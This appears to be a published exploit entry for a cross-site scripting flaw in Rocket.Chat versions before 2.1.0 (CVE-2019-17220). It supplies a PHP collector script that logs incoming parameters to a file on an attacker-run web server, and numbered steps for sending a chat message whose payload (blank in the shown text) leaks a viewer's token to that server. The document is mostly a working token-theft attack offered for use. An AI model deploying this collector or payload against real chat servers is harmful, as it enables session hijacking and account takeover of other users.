25 lines
No EOL
643 B
Text
25 lines
No EOL
643 B
Text
# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting
|
|
# Author: 3H34N
|
|
# Date: 2019-10-22
|
|
# Product: Rocket.Chat
|
|
# Vendor: https://rocket.chat/
|
|
# Vulnerable Version(s): Rocket.Chat < 2.1.0
|
|
# CVE: CVE-2019-17220
|
|
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)
|
|
|
|
# PoC
|
|
# 1. Create l33t.php on a web server
|
|
|
|
<?php
|
|
$output = fopen("logs.txt", "a+") or die("WTF? o.O");
|
|
$leet = $_GET['leet']."\n\n";
|
|
fwrite($output, $leet);
|
|
fclose($output);
|
|
?>
|
|
|
|
# 2. Open a chat session
|
|
# 3. Send payload with your web server url
|
|
|
|
|
|
|
|
# 4. Token will be written in logs.txt when target seen your message. |